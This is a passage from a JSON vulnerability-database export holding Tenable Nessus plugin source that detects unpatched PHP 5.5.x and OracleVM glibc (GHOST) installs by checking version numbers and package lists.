"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9705", "CVE-2015-0235", "CVE-2015-0273", "CVE-2015-2301", "CVE-2015-8866"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_5_22.NASL", "href": "https://www.tenable.com/plugins/nessus/81511", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81511);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2014-9705\",\n \"CVE-2015-0235\",\n \"CVE-2015-0273\",\n \"CVE-2015-2301\",\n \"CVE-2015-8866\"\n );\n script_bugtraq_id(\n 72325,\n 72701,\n 73031,\n 73034,\n 73037\n );\n script_xref(name:\"CERT\", value:\"967332\");\n\n script_name(english:\"PHP 5.5.x < 5.5.22 Multiple Vulnerabilities (GHOST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP 5.5.x installed on the\nremote host is prior to 5.5.22. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A heap-based buffer overflow flaw in the\n enchant_broker_request_dict function in\n ext/enchant/enchant.c could allow a remote attacker\n to cause a buffer overflow, resulting in\n a denial of service condition or the execution of\n arbitrary code. (CVE-2014-9705)\n\n - A heap-based buffer overflow flaw in the GNU C Library\n (glibc) due to improperly validating user-supplied input\n in the glibc functions __nss_hostname_digits_dots(),\n gethostbyname(), and gethostbyname2(). This allows a\n remote attacker to cause a buffer overflow, resulting in\n a denial of service condition or the execution of\n arbitrary code. (CVE-2015-0235)\n\n - A use-after-free flaw exists in the function\n php_date_timezone_initialize_from_hash() within the\n 'ext/date/php_date.c' script. An attacker can exploit\n this to access sensitive information or crash\n applications linked to PHP. (CVE-2015-0273)\n\n - A use-after-free vulnerability in the\n phar_rename_archive function in phar_object.c could\n allow a remote attacker to cause a denial of service.\n (CVE-2015-2301)\n\n - An XML External Entity (XXE) flaw exists in the PHP-FPM\n component due to improper parsing of XML data. A remote\n attacker can exploit this, via specially crafted XML\n data, to disclose sensitive information or cause a\n denial of service. (CVE-2015-8866)\n \nNote that Nessus has not attempted to exploit these issues but has\ninstead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/ChangeLog-5.php#5.5.22\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.php.net/bug.php?id=68925\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.php.net/bug.php?id=68942\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 5.5.22 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported) audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^5(\\.5)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^5\\.5\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 5.5.x\", port);\n\nif (version =~ \"^5\\.5\\.([0-9]|1[0-9]|2[01])($|[^0-9])\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version +\n '\\n Fixed version : 5.5.22' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:49:42", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - Switch to use malloc when the input line is too long [Orabug 19951108]\n\n - Use a /sys/devices/system/cpu/online for\n _SC_NPROCESSORS_ONLN implementation [Orabug 17642251] (Joe Jin)\n\n - Fix parsing of numeric hosts in gethostbyname_r (CVE-2015-0235, #1183532).\n\n - Remove gconv transliteration loadable modules support (CVE-2014-5119, - _nl_find_locale: Improve handling of crafted locale names (CVE-2014-0475, \n\n - Fix patch for integer overflows in *valloc and memalign.\n (CVE-2013-4332, #1011805).\n\n - Fix return code when starting an already started nscd daemon (#979413).\n\n - Fix getnameinfo for many PTR record queries (#1020486).\n\n - Return EINVAL error for negative sizees to getgroups (#995207).\n\n - Fix integer overflows in *valloc and memalign.\n (CVE-2013-4332, #1011805).\n\n - Add support for newer L3 caches on x86-64 and correctly count the number of hardware threads sharing a cacheline (#1003420).\n\n - Revert incomplete fix for bug #758193.\n\n - Fix _nl_find_msg malloc failure case, and callers (#957089).\n\n - Test on init_fct, not result->__init_fct, after demangling (#816647).\n\n - Don't handle ttl == 0 specially (#929035).\n\n - Fix multibyte character processing crash in regexp (CVE-2013-0242, #951132)\n\n - Fix getaddrinfo stack overflow resulting in application crash (CVE-2013-1914, #951132)\n\n - Add missing patch to avoid use after free (#816647)\n\n - Fix race in initgroups compat_call (#706571)\n\n - Fix return value from getaddrinfo when servers are down.\n (#758193)\n\n - Fix fseek on wide character streams. Sync's seeking code with RHEL 6 (#835828)\n\n - Call feraiseexcept only if exceptions are not masked (#861871).\n\n - Always demangle function before checking for NULL value.\n (#816647).\n\n - Do not fail in ttyname if /proc is not available (#851450).\n\n - Fix errno for various overflow situations in vfprintf.\n Add missing overflow checks. (#857387)\n\n - Handle failure of _nl_explode_name in all cases (#848481)\n\n - Define the default fuzz factor to 2 to make it easier to manipulate RHEL 5 RPMs on RHEL 6 and newer systems.\n\n - Fix race in intl/* testsuite (#849202)\n\n - Fix out of bounds array access in strto* exposed by 847930 patch.\n\n - Really fix POWER4 strncmp crash (#766832).\n\n - Fix integer overflow leading to buffer overflow in strto* (#847930)\n\n - Fix race in msort/qsort (#843672)\n\n - Fix regression due to 797096 changes (#845952)\n\n - Do not use PT_IEEE_IP ptrace calls (#839572)\n\n - Update ULPs (#837852)\n\n - Fix various transcendentals in non-default rounding modes (#837852)\n\n - Fix unbound alloca in vfprintf (#826947)\n\n - Fix iconv segfault if the invalid multibyte character 0xffff is input when converting from IBM930. (#823905)\n\n - Fix fnmatch when '*' wildcard is applied on a file name containing multibyte chars. (#819430)\n\n - Fix unbound allocas use in glob_in_dir, getaddrinfo and others. (#797096)\n\n - Fix segfault when running ld.so --verify on some DSO's in current working directory. (#808342)\n\n - Incorrect initialization order for dynamic loader (#813348)\n\n - Fix return code when stopping already stopped nscd daemon (#678227)\n\n - Remove MAP_32BIT for pthread stack mappings, use MAP_STACK instead (#641094)\n\n - Fix setuid vs sighandler_setxid race (#769852)\n\n - Fix access after end of search string in regex matcher (#757887)\n\n - Fix POWER4 strncmp crash (#766832)\n\n - Fix SC_*CACHE detection for X5670 cpus (#692182)\n\n - Fix parsing IPV6 entries in /etc/resolv.conf (#703239)\n\n - Fix double-free in nss_nis code (#500767)\n\n - Add kernel VDSO support for s390x (#795896)\n\n - Fix race in malloc arena creation and make implementation match documented behaviour (#800240)\n\n - Do not override TTL of CNAME with TTL of its alias (#808014)\n\n - Fix short month names in fi_FI locale #(657266).\n\n - Fix nscd crash for group with large number of members (#788989)\n\n - Fix Slovakia currency (#799853)\n\n - Fix getent malloc failure check (#806403)\n\n - Fix short month names in zh_CN locale (#657588)\n\n - Fix decimal point symbol for Portuguese currency (#710216)\n\n - Avoid integer overflow in sbrk (#767358)\n\n - Avoid race between [,__de]allocate_stack and\n __reclaim_stacks during fork (#738665)\n\n - Fix race between IO_flush_all_lockp & pthread_cancel (#751748)\n\n - Fix memory leak in NIS endgrent (#809325)\n\n - Allow getaddr to accept SCTP socket types in hints (#765710)\n\n - Fix errno handling in vfprintf (#794814)\n\n - Filter out <built-in> when building file lists (#784646).\n\n - Avoid 'nargs' integer overflow which could be used to bypass FORTIFY_SOURCE (#794814)\n\n - Fix currency_symbol for uk_UA (#639000)", "cvss3": {}, "published": "2015-02-02T00:00:00", "type": "nessus", "title": "OracleVM 2.2 : glibc (OVMSA-2015-0024) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-0242", "CVE-2013-1914", "CVE-2013-4332", "CVE-2014-0475", "CVE-2014-5119", "CVE-2015-0235"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:glibc", "p-cpe:/a:oracle:vm:glibc-common", "p-cpe:/a:oracle:vm:nscd", "cpe:/o:oracle:vm_server:2.2"], "id": "ORACLEVM_OVMSA-2015-0024.NASL", "href": "https://www.tenable.com/plugins/nessus/81119", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2015-0024.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81119);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2013-0242\", \"CVE-2013-1914\", \"CVE-2013-4332\", \"CVE-2014-0475\", \"CVE-2014-5119\", \"CVE-2015-0235\");\n script_bugtraq_id(57638, 58839, 62324, 68505, 68983, 69738, 72325);\n\n script_name(english:\"OracleVM 2.2 : glibc (OVMSA-2015-0024) (GHOST)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Switch to use malloc when the input line is too long\n [Orabug 19951108]\n\n - Use a /sys/devices/system/cpu/online for\n _SC_NPROCESSORS_ONLN implementation [Orabug 17642251]\n (Joe Jin)\n\n - Fix parsing of numeric hosts in gethostbyname_r\n (CVE-2015-0235, #1183532).\n\n - Remove gconv transliteration loadable modules support\n (CVE-2014-5119, - _nl_find_locale: Improve handling of\n crafted locale names (CVE-2014-0475, \n\n - Fix patch for integer overflows in *valloc and memalign.\n (CVE-2013-4332, #1011805).\n\n - Fix return code when starting an already started nscd\n daemon (#979413).\n\n - Fix getnameinfo for many PTR record queries (#1020486).\n\n - Return EINVAL error for negative sizees to getgroups\n (#995207).\n\n - Fix integer overflows in *valloc and memalign.\n (CVE-2013-4332, #1011805).\n\n - Add support for newer L3 caches on x86-64 and correctly\n count the number of hardware threads sharing a cacheline\n (#1003420).\n\n - Revert incomplete fix for bug #758193.\n\n - Fix _nl_find_msg malloc failure case, and callers\n (#957089).\n\n - Test on init_fct, not result->__init_fct, after\n demangling (#816647).\n\n - Don't handle ttl == 0 specially (#929035).\n\n - Fix multibyte character processing crash in regexp\n (CVE-2013-0242, #951132)\n\n - Fix getaddrinfo stack overflow resulting in application\n crash (CVE-2013-1914, #951132)\n\n - Add missing patch to avoid use after free (#816647)\n\n - Fix race in initgroups compat_call (#706571)\n\n - Fix return value from getaddrinfo when servers are down.\n (#758193)\n\n - Fix fseek on wide character streams. Sync's seeking code\n with RHEL 6 (#835828)\n\n - Call feraiseexcept only if exceptions are not masked\n (#861871).\n\n - Always demangle function before checking for NULL value.\n (#816647).\n\n - Do not fail in ttyname if /proc is not available\n (#851450).\n\n - Fix errno for various overflow situations in vfprintf.\n Add missing overflow checks. (#857387)\n\n - Handle failure of _nl_explode_name in all cases\n (#848481)\n\n - Define the default fuzz factor to 2 to make it easier to\n manipulate RHEL 5 RPMs on RHEL 6 and newer systems.\n\n - Fix race in intl/* testsuite (#849202)\n\n - Fix out of bounds array access in strto* exposed by\n 847930 patch.\n\n - Really fix POWER4 strncmp crash (#766832).\n\n - Fix integer overflow leading to buffer overflow in\n strto* (#847930)\n\n - Fix race in msort/qsort (#843672)\n\n - Fix regression due to 797096 changes (#845952)\n\n - Do not use PT_IEEE_IP ptrace calls (#839572)\n\n - Update ULPs (#837852)\n\n - Fix various transcendentals in non-default rounding\n modes (#837852)\n\n - Fix unbound alloca in vfprintf (#826947)\n\n - Fix iconv segfault if the invalid multibyte character\n 0xffff is input when converting from IBM930. (#823905)\n\n - Fix fnmatch when '*' wildcard is applied on a file name\n containing multibyte chars. (#819430)\n\n - Fix unbound allocas use in glob_in_dir, getaddrinfo and\n others. (#797096)\n\n - Fix segfault when running ld.so --verify on some DSO's\n in current working directory. (#808342)\n\n - Incorrect initialization order for dynamic loader\n (#813348)\n\n - Fix return code when stopping already stopped nscd\n daemon (#678227)\n\n - Remove MAP_32BIT for pthread stack mappings, use\n MAP_STACK instead (#641094)\n\n - Fix setuid vs sighandler_setxid race (#769852)\n\n - Fix access after end of search string in regex matcher\n (#757887)\n\n - Fix POWER4 strncmp crash (#766832)\n\n - Fix SC_*CACHE detection for X5670 cpus (#692182)\n\n - Fix parsing IPV6 entries in /etc/resolv.conf (#703239)\n\n - Fix double-free in nss_nis code (#500767)\n\n - Add kernel VDSO support for s390x (#795896)\n\n - Fix race in malloc arena creation and make\n implementation match documented behaviour (#800240)\n\n - Do not override TTL of CNAME with TTL of its alias\n (#808014)\n\n - Fix short month names in fi_FI locale #(657266).\n\n - Fix nscd crash for group with large number of members\n (#788989)\n\n - Fix Slovakia currency (#799853)\n\n - Fix getent malloc failure check (#806403)\n\n - Fix short month names in zh_CN locale (#657588)\n\n - Fix decimal point symbol for Portuguese currency\n (#710216)\n\n - Avoid integer overflow in sbrk (#767358)\n\n - Avoid race between [,__de]allocate_stack and\n __reclaim_stacks during fork (#738665)\n\n - Fix race between IO_flush_all_lockp & pthread_cancel\n (#751748)\n\n - Fix memory leak in NIS endgrent (#809325)\n\n - Allow getaddr to accept SCTP socket types in hints\n (#765710)\n\n - Fix errno handling in vfprintf (#794814)\n\n - Filter out <built-in> when building file lists\n (#784646).\n\n - Avoid 'nargs' integer overflow which could be used to\n bypass FORTIFY_SOURCE (#794814)\n\n - Fix currency_symbol for uk_UA (#639000)\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2015-January/000261.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b908cf01\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc / glibc-common / nscd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:2.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/02\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"2\\.2\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 2.2\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS2.2\", reference:\"glibc-2.5-123.0.1.el5_11.1\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"glibc-common-2.5-123.0.1.el5_11.1\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"nscd-2.5-123.0.1.el5_11.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / nscd\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T16:31:36", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - Update fix for CVE-2015-7547 (#1296028).\n\n - Create helper threads with enough stack for POSIX AIO and timers (#1301625).\n\n - Fix CVE-2015-7547: getaddrinfo stack-based buffer overflow (#1296028).\n\n - Support loading more libraries with static TLS (#1291270).\n\n - Check for NULL arena pointer in _int_pvalloc (#1256890).\n\n - Don't change no_dyn_threshold on mallopt failure (#1256891).\n\n - Unlock main arena after allocation in calloc (#1256812).\n\n - Enable robust malloc change again (#1256812).\n\n - Fix perturbing in malloc on free and simply perturb_byte (#1256812).\n\n - Don't fall back to mmap prematurely (#1256812).\n\n - The malloc deadlock avoidance support has been temporarily removed since it triggers deadlocks in certain applications (#1244002).\n\n - Fix ruserok check to reject, not skip, negative user checks (#1217186).\n\n - Optimize ruserok function for large ~/.rhosts (#1217186).\n\n - Fix crash in valloc due to the backtrace deadlock fix (#1207236).\n\n - Fix buffer overflow in gethostbyname_r with misaligned buffer (#1209376, CVE-2015-1781).\n\n - Avoid deadlock in malloc on backtrace (#1066724).\n\n - Support running applications that use Intel AVX-512 (#1195453).\n\n - Silence logging of record type mismatch for DNSSEC records (#1088301).\n\n - Shrink heap on free when vm.overcommit_memory == 2 (#867679).\n\n - Enhance nscd to detect any configuration file changes (#859965).\n\n - Fix __times handling of EFAULT when buf is NULL (#1124204).\n\n - Fix memory leak with dlopen and thread-local storage variables (#978098).\n\n - Prevent getaddrinfo from writing DNS queries to random fd (CVE-2013-7423, - Implement userspace half of in6.h header coordination (#1053178).\n\n - Correctely size relocation cache used by profiler (#1144132).\n\n - Fix reuse of cached stack leading to bounds overrun of DTV (#1116050).\n\n - Return failure in getnetgrent only when all netgroups have been searched (#1085312).\n\n - Fix valgrind warning in nscd_stats (#1091915).\n\n - Initialize xports array (#1159167).\n\n - Fix tst-default-attr test to not fail on powerpc (#1023306).\n\n - Fix parsing of numeric hosts in gethostbyname_r (CVE-2015-0235, #1183534).\n\n - Fix typo in nscd/selinux.c (#1125307).\n\n - Actually run test-iconv modules (#1176907).\n\n - Fix recursive dlopen (#1154563).\n\n - Fix crashes on invalid input in IBM gconv modules (CVE-2014-6040, #1172044).\n\n - Fix wordexp to honour WRDE_NOCMD (CVE-2014-7817, #1171296).\n\n - Fix typo in res_send and res_query (#rh1138769).", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-02-17T00:00:00", "type": "nessus", "title": "OracleVM 3.3 : glibc (OVMSA-2016-0013) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7423", "CVE-2014-6040", "CVE-2014-7817", "CVE-2015-0235", "CVE-2015-1781", "CVE-2015-7547"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:glibc", "p-cpe:/a:oracle:vm:glibc-common", "p-cpe:/a:oracle:vm:nscd", "cpe:/o:oracle:vm_server:3.3"], "id": "ORACLEVM_OVMSA-2016-0013.NASL", "href": "https://www.tenable.com/plugins/nessus/88783", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2016-0013.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88783);\n script_version(\"2.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2013-7423\", \"CVE-2014-6040\", \"CVE-2014-7817\", \"CVE-2015-0235\", \"CVE-2015-1781\", \"CVE-2015-7547\");\n script_bugtraq_id(69472, 71216, 72325, 72844, 74255);\n script_xref(name:\"TRA\", value:\"TRA-2017-08\");\n script_xref(name:\"IAVA\", value:\"2016-A-0053\");\n\n script_name(english:\"OracleVM 3.3 : glibc (OVMSA-2016-0013) (GHOST)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Update fix for CVE-2015-7547 (#1296028).\n\n - Create helper threads with enough stack for POSIX AIO\n and timers (#1301625).\n\n - Fix CVE-2015-7547: getaddrinfo stack-based buffer\n overflow (#1296028).\n\n - Support loading more libraries with static TLS\n (#1291270).\n\n - Check for NULL arena pointer in _int_pvalloc (#1256890).\n\n - Don't change no_dyn_threshold on mallopt failure\n (#1256891).\n\n - Unlock main arena after allocation in calloc (#1256812).\n\n - Enable robust malloc change again (#1256812).\n\n - Fix perturbing in malloc on free and simply perturb_byte\n (#1256812).\n\n - Don't fall back to mmap prematurely (#1256812).\n\n - The malloc deadlock avoidance support has been\n temporarily removed since it triggers deadlocks in\n certain applications (#1244002).\n\n - Fix ruserok check to reject, not skip, negative user\n checks (#1217186).\n\n - Optimize ruserok function for large ~/.rhosts\n (#1217186).\n\n - Fix crash in valloc due to the backtrace deadlock fix\n (#1207236).\n\n - Fix buffer overflow in gethostbyname_r with misaligned\n buffer (#1209376, CVE-2015-1781).\n\n - Avoid deadlock in malloc on backtrace (#1066724).\n\n - Support running applications that use Intel AVX-512\n (#1195453).\n\n - Silence logging of record type mismatch for DNSSEC\n records (#1088301).\n\n - Shrink heap on free when vm.overcommit_memory == 2\n (#867679).\n\n - Enhance nscd to detect any configuration file changes\n (#859965).\n\n - Fix __times handling of EFAULT when buf is NULL\n (#1124204).\n\n - Fix memory leak with dlopen and thread-local storage\n variables (#978098).\n\n - Prevent getaddrinfo from writing DNS queries to random\n fd (CVE-2013-7423, - Implement userspace half of in6.h\n header coordination (#1053178).\n\n - Correctely size relocation cache used by profiler\n (#1144132).\n\n - Fix reuse of cached stack leading to bounds overrun of\n DTV (#1116050).\n\n - Return failure in getnetgrent only when all netgroups\n have been searched (#1085312).\n\n - Fix valgrind warning in nscd_stats (#1091915).\n\n - Initialize xports array (#1159167).\n\n - Fix tst-default-attr test to not fail on powerpc\n (#1023306).\n\n - Fix parsing of numeric hosts in gethostbyname_r\n (CVE-2015-0235, #1183534).\n\n - Fix typo in nscd/selinux.c (#1125307).\n\n - Actually run test-iconv modules (#1176907).\n\n - Fix recursive dlopen (#1154563).\n\n - Fix crashes on invalid input in IBM gconv modules\n (CVE-2014-6040, #1172044).\n\n - Fix wordexp to honour WRDE_NOCMD (CVE-2014-7817,\n #1171296).\n\n - Fix typo in res_send and res_query (#rh1138769).\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2016-February/000418.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?92d5b0bd\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc / glibc-common / nscd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n 